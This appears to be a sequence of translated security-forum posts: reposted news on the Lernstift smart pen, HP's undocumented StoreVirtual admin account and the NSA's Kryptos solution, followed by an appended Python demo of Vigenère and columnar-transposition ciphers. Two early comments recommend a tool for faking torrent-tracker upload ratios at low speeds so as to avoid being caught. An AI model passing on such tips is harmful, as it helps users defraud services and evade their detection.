  18. For external sites it's not bad. Leave it running for a day and a night and you have 100 GB guaranteed.
  19. Yes, I used it a while ago. I didn't use it on FILELIST, since I don't need to, but on external trackers like IPT, Speed.Cd. Be careful though: set low upload speeds, like 1,2 mb/s, because it will catch you.
  20. It was already posted once here: https://rstforums.com/forum/71020-fostul-director-de-securitate-al-facebook-devenit-spion-digital-pentru-nsa.rst
  21. This is a "news item" that deserves to be posted in the Trash Bin. That site was probably "hacked" by a group of kids and they left a "Hacked by xxx" too. A pathetic gesture anyway.
  22. I had the same reaction when I read the news. In fact, I'm still amused.
  23. Lernstift — German for “learning pen” — is a Linux-based smart pen that will notify users when they make mistakes. Photo: Lernstift

What if your pen could warn you about spelling mistakes, just like your word processor? Lernstift — German for “learning pen” — is a Linux-based smart pen that not only corrects spelling, but can also help students, or anyone else, improve their handwriting.

There are other smart pens on the market, such as the Livescribe, but Lernstift is unusual in that it doesn’t require special paper and will have exchangeable pen tips — including a fountain pen module, a ballpoint module, and, eventually, a pencil module. The gadget is now available for pre-order through Kickstarter and is expected to ship in December.

But why worry about enhancing handwriting on paper just when society seems to be abandoning that skill in favor of typing, or at least using digital styluses?

Lernstift inventor Falk Wolsky explains that the idea was born out of frustration with his oldest son’s homework mistakes. Wolsky says his son was too often distracted, and would make small, preventable errors. “My wife said: ‘I wish the pen would give him an electroshock or something to make him think about his spelling,’” Wolsky says. “I thought, an electroshock wasn’t so good, but a vibration might work.”

Wolsky doubts old fashioned handwriting will ever go away, citing research on its cognitive benefits. For example, one study by researchers at Indiana University found that students who wrote letters and other symbols by hand could better identify those shapes later than those who just studied them without writing them.

Lernstift works by monitoring what a user is writing using built-in sensors. It can then send data wirelessly to a computer or tablet that can analyze what’s being written and then tell the pen to vibrate if the user draws a letter too sloppily, or if they misspell a word.

“They get instant feedback, instead of feedback three days later when the teacher hands the paper back covered in red marks,” Wolsky says.

The pen uses a custom embedded Linux operating system with custom, closed-source software that controls the sensors and handles handwriting recognition. But Lernstift will have an open API so that developers can build new applications for the pen, whether that’s new dictionaries to support spell checking in different languages, or ways to use the pen to transfer drawings to Photoshop. “The developer platform is extremely important part for us,” he says.

Lernstift is yet another example of how “the internet of things” can turn household items like pens into programmable “smart objects.” Even something as old fashioned as handwriting can be given new dimensions.

Source: Wired.Com

My opinion: This invention is a brilliant one; it would be a surprise element to give to children aged 6-16, Romanian children in general, to learn to write, and to be warned at every mistake, or as the wife of the man above said: "give them an electroshock" (just kiddin')
  24. Hewlett-Packard has agreed that there is an undocumented administrative account in its StoreVirtual products, and is promising a patch by 17 July.

The issue, which seems to have existed since 2009, was brought to the attention of The Register by Technion, the blogger who earlier published an undocumented backdoor in the company's StoreOnce products.

Since then, some HP users have confirmed the backdoors in e-mail to The Register, providing evidence of the account names and passwords that allow access to the devices. The Reg can report those credentials would not pass complexity tests required by many websites as they use no numerals, symbols or capital letters.

HP has now issued this security advisory, stating:

The company states that “Root access to the LeftHand OS does not provide access to the user data being stored on the system”.

Although data isn't accessible via the backdoor, one user with around 50 TB of StoreVirtual capacity said the account gave sufficient access to reboot nodes in a cluster, “and so cripple the cluster”.

“It lets you browse to "SMH » Security » Trusted Management Servers" though, ("Certificates are used to establish the trust relationship between Systems Insight Manager or Insight Manager 7 and the System Management Homepage.") You can use that to import a certificate to trust another Systems Insight Manager box,” said that user, who asked not to be identified.

And, of course, there's the "reset factory defaults" option, which would nuke all a user's data. ®

Source: TheRegister.co.uk
  25. It took more than eight years for a CIA analyst and a California computer scientist to crack three of the four coded messages on the CIA’s famed Kryptos sculpture in the late ’90s. Little did either of them know that a small group of cryptanalysts inside the NSA had beat them to it, and deciphered the same three sections of Kryptos years earlier — and they did it in less than a month, according to new documents obtained from the NSA. These days the NSA is best known for its broad, indiscriminate spying on Americans and foreigners. But the Kryptos crack shows how some of the agency’s smartest geeks once blew off steam in the relatively quiet days between the end of the Cold War and the September 11 attacks. The popular story of Kryptos has long held that CIA analyst David Stein was the first to crack three of the cryptographic sculpture’s four puzzles in 1998. Stein decrypted the coded messages after spending some 400 hours’ worth of lunch hours working through the puzzles using only paper and pencil. Many people, on and off the CIA campus in Langley, Virginia, had tried to break the coded puzzle, but only Stein, a member of the agency’s Directorate of Intelligence, succeeded. Stein’s work on the code was kept secret, however. In 1999, he wrote a fascinating account of how he cracked three of the sculpture’s four coded messages, but it was only published in an internal CIA newsletter that remained classified until years later. The secrecy over Stein’s achievement allowed California computer scientist Jim Gillogly to steal the spotlight a year later in 1999, when he announced that he’d also cracked the same three messages, only he used a Pentium II to do it. But new documents released by the National Security Agency show how the Defense Department’s spy agency beat Stein and Gillogly to the punch years earlier. An internal NSA memo discussing the agency’s success at cracking three of the sculpture’s four puzzles. 
Courtesy of Elonka Dunin It’s a story that has largely remained buried in the NSA archives until Elonka Dunin unearthed it in a recent FOIA request. Dunin is the premier expert on Kryptos who oversees a Yahoo Group dedicated to cracking the code and also maintains a website dedicated to the sculpture. Although a Baltimore Sun story about Kryptos in 2000 disclosed that the NSA had cracked three sections of the puzzle, many of the details behind the efforts were not revealed. It all began in 1988 when the CIA Fine Arts Commission commissioned local artist James Sanborn to create a cryptographic sculpture for a courtyard on the CIA campus. Sanborn completed the two-part sculpture in 1990, which included stones laid out in International Morse code near the front entrance of the CIA campus, and a 12-foot-high, verdigrised copper, granite and petrified wood sculpture. The latter, which is the more famous part of Kryptos, was inscribed with four encrypted messages composed from some 1,800 letters carved out of the copper plate. One of the memos notes that the layout of the two-part sculpture was “a landscaping scheme designed to recall the natural stone out-cropping that existed on the site before the Agency, and that will endure as do mountains.” The placement of the sculpture “in a geologic context reinforces the text’s ‘hidden-ness’ as if it were a fossil or an image frozen in time.” In 1991, while on a trip to the CIA, a group of NSA cryptanalysis “interns” diligently scribbled all the letters from the sculpture onto sheets of paper and brought them back to the NSA so curious analysts there could take a crack at it. In December 1991 a group of NSA analysts met in a conference room at the NSA to discuss the sculpture and what methods of decryption they might apply, including classified methods used internally by the NSA. 
A memo about this meeting indicates that “any discussion of ‘in-house’ techniques or applications (being classified) are not mentioned in this text as it is to be unclassified.” The memo also included a note to participants not to discuss their efforts to crack the puzzle in public, as some of the methods they used might be classified, as well as a message at the bottom of the memo indicating that “these notes were prepared at NO expense to the US Government.” After that initial NSA meeting, however, nothing further was done on the puzzle. Over the next year, the CIA tried to crack the sculpture on its own, but with no success. The sculpture remained unsolved until 1992, when Adm. William O. Studeman, the CIA’s then-deputy director and a former NSA director, issued a formal challenge to his former colleagues at the NSA to solve the CIA’s new courtyard puzzle. The NSA’s director at the time, Vice Admiral Mike McConnell, announced the challenge during an internal ceremony at the NSA, and a small cadre of cryptanalysts from the agency’s Z Group — the internal name for the cryptanalysts division — “enthusiastically responded.” Left on their own, NSA employees had shown little passion for cracking the ciphers, but once a formal challenge was on the table from the CIA, it was hard to resist. The group was so intent on cracking the code that they formed an informal task force in November 1992, according to the recently released documents, which include a number of internal NSA memos describing how they cracked the ciphers. Working from the transcription obtained by interns a year earlier, they quickly determined, using computer diagnostic tools, that the sculpture consisted of four parts — using at least three different ciphers — and a cryptographic table based on an encryption method developed in the 16th century by a Frenchman named Blaise de Vigenere that was key to helping them solve parts of the puzzle. 
They were sure to note that subsequent analysis and solutions of the code “did not require any computer power” but were done by hand. They quickly discovered that the encrypted sections included intentional spelling errors made by artist James Sanborn, and misaligned characters set higher on a line of text than characters around them. Then “within two days of receiving the information tasking from Chief, Z,” they had solved parts one through three of the puzzle. They spent another day on the fourth section, but very quickly “a decision was made to stop any further work” on it. “Given the suspected cryptography, the last section is too short to solve without diverting a great deal of effort from operational problems,” they wrote in the memo.

In the end, it was just three analysts who solved the codes, one tackling each section of the puzzle. Although the names are redacted in the documents released by the NSA, Dennis McDaniels was identified as one of the crackers in the Baltimore Sun article. Ken Miller was also identified as another member of the group, though someone knowledgeable about the project told Wired that he didn’t decipher any of the sections but worked closely with the group to write up their notes.

In June 1993, after the three parts were cracked, an internal letter announcing the feat was sent to Admiral McConnell at the NSA, marked “For Official Use Only” and informing him that the deed was done. It was returned with a request to forward the note to Admiral Studeman at the CIA, no doubt with an air of glee and arrogance that the NSA had beaten the CIA at cracking its own puzzle. Another scribbled note on the memo read, “Great Story!”

The documents describe their efforts through “many wrong turns” to arrive at the solutions.
The first part of the sculpture used a periodic polyalphabetic substitution cipher using 10 alphabets, and when decrypted was a poetic phrase that Sanborn had composed himself: “Between subtle shading and the absence of light lies the nuance of iqlusion” (“iqlusion” was an intentional misspelling of illusion).

Part two used a periodic polyalphabetic substitution cipher using 8 alphabets. When decrypted, the passage hinted at something buried:

It was totally invisible. How’s that possible? They used the Earth’s magnetic field. x The information was gathered and transmitted underground to an unknown location. x Does Langley know about this? They should: It’s buried out there somewhere. x Who knows the exact location? Only WW. This was his last message. x Thirty-eight degrees fifty-seven minutes six point five seconds north, seventy-seven degrees eight minutes forty-four seconds west. ID by rows.

The cryptanalysts correctly guessed that WW referred to William Webster, which Wired confirmed in 2005 during an interview with artist Sanborn. “The coordinates,” the memo noted, “refer to the location of or a location within the Central Intelligence Agency.” But the significance of the I.D. by Rows? That remained “undetermined,” the NSA’s puzzle crackers wrote.

In fact, Sanborn had made an error in the puzzle and inadvertently introduced a typo in the section. The mistake involved an “x” that he intentionally deleted from the end of a line in section two for aesthetic reasons, to keep the sculpture visually balanced. The “x” was supposed to signify a period or section break at the end of a phrase, but Sanborn removed it thinking it wouldn’t affect the way the puzzle was deciphered. It turned out the “x” made all the difference, however. Instead of “ID by rows” it actually should have been deciphered to read “layer two,” though code breakers wouldn’t discover this until years after the NSA cryptanalysts had their crack at the code.
Part three used a keyed columnar transposition cipher, which the cryptanalysts partly diagnosed solely by “eyeballing” the text. “The most likely explanation for this is a transposition system,” they write, “perhaps a keyed columnar transposition. In such a system, the plain text is inscribed horizontally into a matrix, normally a rectangle, and then the latter are extracted vertically, according to a pre-determined sequence.” When decrypted, it was a paraphrased page taken from the diary of archaeologist Howard Carter describing the opening of a door in King Tut’s tomb on Nov. 26, 1922.

Slowly, desperately slowly, the remains of passage debris that encumbered the lower part of the doorway was removed. With trembling hands I made a tiny breach in the upper left-hand corner. And then, widening the hole a little, I inserted the candle and peered in. The hot air escaping from the chamber caused the flame to flicker, but presently details of the room within emerged from the mist. x Can you see anything? q

According to a former Defense Department cryptanalyst who spoke with Wired, McDaniels was responsible for cracking section three and did it in just six hours lying on his living room couch with paper and pencil after coming home exhausted one day from playing volleyball. McDaniels is now retired from the NSA and declined to speak with Wired about his work on the sculpture. But the source told Wired that McDaniels had been out all day playing volleyball and came home around 10pm. “He plopped down on the couch in the living room, picked up his draft notes for K3,” the source said. “He had tinkered with it before but could never get into it. He knew it was just basic transposition, so he started with the letter Q and [the letter U after it] and found there were five instances of the letter U, and he just tried all five of those. Then he had to try every other vowel that came after and he finally found something that broke it.
By then it was about 4am and he was done.”

Unfortunately the fourth section stymied the NSA code breakers, as it has continued to do other cryptanalysts for 23 years. The documents noted that “although ideas abound” for deciphering it, the final 97 characters of the sculpture “continue to elude solution.”

OBKR
UOXOGHULBSOLIFBBWFLRVQQPRNGKSSO
TWTQSJQSSEKZZWATJKLUDIAWINFBNYP
VTTMZFPKWGDKZXTJCDIGKUHUAUEKCAR

They speculated that this section might employ a combination of the techniques used in other sections. “First the message is encrypted using some set of alphabets,” they write, “as was done in the first and third breakthroughs, and then the cipher is put through a transposition, such as that used in the second breakthrough.” But even with that they were never able to solve it.

In 2010, Sanborn, surprised that the final section had remained unsolved for so long, and perhaps feeling guilty about an error he had made in the sculpture that misled puzzle-solvers for years, decided to disclose six of the 97 letters in the last section. The six letters — NYPVTT — are the 64th through 69th letters of the final section and when deciphered spell out the word “BERLIN.” The clue has yet to be the breakthrough that code crackers had hoped it would be, however, and the last section still remains unsolved.

Even when that final section is solved, however, sleuths still won’t know what the sculpture means. The deciphered text contains a riddle, which will require them to be on the CIA grounds in order to solve it. “In part of the code that’s been deciphered, I refer to an act that took place when I was at the agency and a location that’s on the ground of the agency,” Sanborn told Wired in 2005. He may be referring to something he buried on the CIA grounds, though he won’t say for sure.
The decrypted text gives latitude and longitude coordinates (38 57 6.5 N, 77 8 44 W), which Sanborn has said refer to “locations of the agency.” So sleuths will have to first decipher the code then find their way onto the CIA grounds and locate that place in order to finally discover what it all means.

Source: Wired.Com
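Added example, not part of the original post or of the Wired article: a small Python implementation of the two cipher families the NSA memos name, a periodic polyalphabetic substitution over the textbook Vigenère table (one alphabet per key letter, so the period equals the key length, as in the 10- and 8-alphabet sections described above) and a keyed columnar transposition (plaintext written row by row into a rectangle, columns read out in an order fixed by the key), together with the index-of-coincidence test that recovers the period of a periodic substitution from ciphertext statistics alone. The sample plaintext, the keys PALIMSET, ZEBRA and KRYPTOS used as keys, the plain A-Z alphabet and the X padding to a full rectangle are all constructed assumptions for this illustration; the sculpture's own alphabets and keys are not reproduced here.

```python
"""Toy versions of a periodic polyalphabetic (Vigenere-table) substitution and a
keyed columnar transposition, plus the index-of-coincidence period test.
Constructed example: the alphabet, keys and sample text are assumptions, not the
sculpture's actual cipher material."""
import string
from collections import Counter

ALPHABET = string.ascii_uppercase

# Constructed sample plaintext (not from the sculpture), long enough for the
# per-column statistics below to be meaningful.
SAMPLE_PLAINTEXT = (
    "The first part of the sculpture used a periodic polyalphabetic substitution "
    "cipher with ten alphabets and the second part used eight. A periodic "
    "substitution betrays its key length in the statistics of the ciphertext: "
    "letters that were enciphered under the same alphabet keep the lopsided "
    "frequency profile of English, while a column that mixes several alphabets "
    "looks nearly flat. A transposition leaves the letter frequencies of the "
    "plaintext untouched and only scrambles their order, which is why the "
    "analysts could tell the third section apart simply by eyeballing it. "
    "Combining both operations, as the analysts suspected of the fourth section, "
    "hides the period test behind the reordering and leaves a short text with "
    "very little structure to attack. Frequency counts, period estimation and "
    "anagramming are the tools a reviewer uses to judge how little protection "
    "such classical schemes offer."
)


def clean(text):
    """Keep only A-Z, upper-cased, as an analyst transcribing letters would."""
    return "".join(c for c in text.upper() if c in ALPHABET)


def vigenere(text, key, decrypt=False):
    """Periodic polyalphabetic substitution over the plain 26-letter table.
    Position i is enciphered with the alphabet named by key[i % len(key)]."""
    t, k = clean(text), clean(key)
    sign = -1 if decrypt else 1
    return "".join(
        ALPHABET[(ALPHABET.index(c) + sign * ALPHABET.index(k[i % len(k)])) % 26]
        for i, c in enumerate(t)
    )


def column_order(key):
    """Read-out order of the columns: alphabetical rank of the key letters,
    ties broken left to right."""
    k = clean(key)
    return sorted(range(len(k)), key=lambda i: (k[i], i))


def columnar_encrypt(text, key):
    """Inscribe the plaintext horizontally into a rectangle as wide as the key,
    pad the last row with X, then extract the columns vertically in key order."""
    t = clean(text)
    width = len(clean(key))
    t += "X" * ((-len(t)) % width)
    rows = [t[i:i + width] for i in range(0, len(t), width)]
    return "".join(row[c] for c in column_order(key) for row in rows)


def columnar_decrypt(cipher, key):
    """Inverse of columnar_encrypt: refill the columns in key order, read the rows."""
    width = len(clean(key))
    height = len(cipher) // width
    grid = [[""] * width for _ in range(height)]
    pos = 0
    for c in column_order(key):
        for r in range(height):
            grid[r][c] = cipher[pos]
            pos += 1
    return "".join("".join(row) for row in grid)


def index_of_coincidence(text):
    """Probability that two letters drawn from the text are equal
    (about 0.066 for English, about 0.038 for uniformly random letters)."""
    n = len(text)
    if n < 2:
        return 0.0
    return sum(v * (v - 1) for v in Counter(text).values()) / (n * (n - 1))


def estimate_period(cipher, max_period=12):
    """Split the ciphertext into p columns for each candidate period p and average
    their IC. Columns enciphered under one alphabet keep English's skewed IC;
    columns that mix alphabets flatten out. The best-scoring p is the estimate."""
    scores = {}
    for p in range(1, max_period + 1):
        cols = [cipher[i::p] for i in range(p)]
        scores[p] = sum(index_of_coincidence(c) for c in cols) / p
    return max(scores, key=scores.get)


def demo():
    """Round-trip both ciphers on the sample text and recover the substitution period."""
    sub = vigenere(SAMPLE_PLAINTEXT, "PALIMSET")       # 8 alphabets, like part two
    tr = columnar_encrypt(SAMPLE_PLAINTEXT, "KRYPTOS")  # 7 columns
    return {
        "substitution_period": estimate_period(sub),
        "substitution_roundtrip": vigenere(sub, "PALIMSET", decrypt=True) == clean(SAMPLE_PLAINTEXT),
        "transposition_roundtrip": columnar_decrypt(tr, "KRYPTOS").rstrip("X") == clean(SAMPLE_PLAINTEXT),
        "substitution_ic": round(index_of_coincidence(sub), 3),
        "transposition_ic": round(index_of_coincidence(tr), 3),
    }


if __name__ == "__main__":
    print(demo())
```

The two IC figures that `demo()` returns show why the memos could diagnose part three by eye: a transposition is a pure permutation, so the ciphertext keeps the plaintext's lopsided letter frequencies (IC near 0.066), whereas a polyalphabetic substitution spreads each plaintext letter over several ciphertext letters and drives the overall IC toward the flat value. The period test then recovers the key length 8 because only at the true period (and its multiples) does every column fall under a single alphabet. Applying a transposition after the substitution, which is what the analysts suspected of the fourth section, breaks the regular spacing that the column split depends on, which is one reason a 97-letter text in that construction is so resistant.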